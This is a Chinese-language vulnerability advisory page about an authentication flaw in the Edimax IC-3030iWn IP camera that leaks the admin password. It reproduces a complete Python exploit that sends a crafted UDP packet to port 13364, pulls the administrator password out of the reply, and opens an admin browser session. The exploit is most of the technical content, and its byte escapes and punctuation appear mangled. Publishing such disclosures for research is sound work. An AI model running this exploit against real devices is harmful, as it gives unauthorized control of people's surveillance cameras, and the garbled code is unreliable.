首页 / 操作系统 / Linux / Edimax IC-3030iWn UDP报文密码信息泄露漏洞

发布日期：2012-06-14
更新日期：2012-06-26受影响系统：
Edimax IC-3030iWn
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 54006Edimax IC-3030iWn是网络监控器。Edimax IC-3030iWn没有正确地身份验证机制，通过发送凭证到客户端进行身份验证，可被利用泄露管理员密码。<*来源：y3dips （y3dips@echo.or.id）
 
  链接：http://secunia.com/advisories/49524/
        http://packetstormsecurity.org/files/113553/Edimax-IC-3030iWn-Authentication-Bypass.html
*>测试方法：
--------------------------------------------------------------------------------警 告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！y3dips （y3dips@echo.or.id）提供了如下测试方法：#！/usr/bin/env python
"""
# Exploit Title: Edimax IC-3030iWn Web Admin Auth Bypass exploit
# Date: 4 April 2012
# Exploit Author: y3dips@echo.or.id, @y3dips
# URL: http://echo.or.id
# Vendor Homepage: http://www.edimax.com
# Sourcecode Link: http://www.edimax.com/en/produce_detail.php？pd_id=352&pl1_id=8&pl2_id=91
# Also Tested on:
   - Edimax IC-3015
   - Airlive WN 500
# Bug found by: Ben Schmidt for RXS-3211 IP camera http://www.securityfocus.com/archive/1/518123
# To successfully automate your browser launch, change browser path.
"""import socket
import webbrowser
import sysif len（sys.argv） ！= 2:
    print "Eg: ./edimaxpwned.py edimax-IP"
    sys.exit（1）port=13364
target= sys.argv[1]
def read_pw（target, port）:
    devmac = "xffxffxffxffxffxff"
    code="x00x06xffxf9" #for unicast reply
    data=devmac+code
    sock =socket.socket（socket.AF_INET,socket.SOCK_DGRAM）
    sock.connect（（target,port））
    try:
        sock.send（data）
        sock.settimeout（5）
        tmp = sock.recv（4096）
        return tmp
    except socket.timeout:
        return Nonedef pwned_edi（）:
    data=read_pw（target, port）
    if data ！= None:
        data=data[365:377]
        pw=data.strip（"x00"）
        webbrowser.get（"/Applications/Firefox.app/Contents/MacOS/firefox-bin %s" ）.open（"http://admin:"+pw+"@"+target+"/index.asp"）
    else:
        print "Socket timeOut or not Vulnerable"pwned_edi（）建议：
--------------------------------------------------------------------------------
厂商补丁：Edimax
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://www.edimax.com.tw/Opera Web Browser 11.65之前版本多个漏洞ZTE Score M sync_agent硬编码密码安全漏洞相关资讯      报文密码信息泄露漏洞  本文评论 查看全部评论 （0）

表情： 姓名： 匿名字数 同意评论声明 发表 评论声明 尊重网上道德，遵守中华人民共和国的各项有关法律法规 承担一切因您的行为而直接或间接导致的民事或刑事法律责任 本站管理人员有权保留或删除其管辖留言中的任意内容 本站有权在网站内转载或引用您的评论 参与本评论即表明您已经阅读并接受上述条款 收藏该网址 版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图